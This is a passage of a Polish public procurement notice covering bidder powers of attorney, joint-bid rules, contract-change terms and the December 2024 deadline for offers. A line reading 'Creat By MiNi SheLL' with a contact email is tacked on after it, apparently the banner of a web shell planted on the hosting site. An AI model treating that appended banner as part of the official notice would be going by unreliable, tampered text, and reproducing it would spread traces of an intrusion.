umocowana do jego<br/>reprezentowania.<br/>3.2.1. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>3.2.2. W przypadku wskazania przez wykonawcę dostępności dokumentów, o których mowa punkcie 3.2., pod określonymi<br/>adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy<br/>przedstawienia tłumaczenia na język polski pobranych samodzielnie przez zamawiającego dokumentów.<br/>3.3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy w przypadku, gdy umocowanie nie wynika z zamówienia<br/>publicznego. Pełnomocnictwo należy dołączyć w oryginale w takiej samej formie, jak składana oferta (tj. w formie<br/>elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§2 ustawy z dnia 14 lutego 1991 r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym<br/>podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo – zgodnie z rozdz. X ppkt. 3.3.<br/>SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo<br/>z umowy podmiotów składających wspólnie ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie<br/>(przez każdego z Wykonawców lub pełnomocnika).<br/>4. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców<br/>składających wspólną ofertę.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt.<br/>3.1 Rozdziału X i pkt. 4.1.1 Rozdziału V składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne dla Zamawiającego postanowienia umowy, zawiera załączony do niniejszej SWZ wzór umowy (Załącznik nr 6 do<br/>SWZ).<br/>2. Zamawiający dopuszcza możliwość zmiany umowy w sprawie realizacji zamówienia publicznego. Zmiana umowy w<br/>sprawie realizacji zamówienia publicznego jest możliwa tylko w zakresie wynikającym z ustawy Pzp (art. 455 ustawy) oraz w<br/>przypadkach przewidzianych w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3e1b2b3d-7795-4803-ab65-28f10489ecce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-20 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com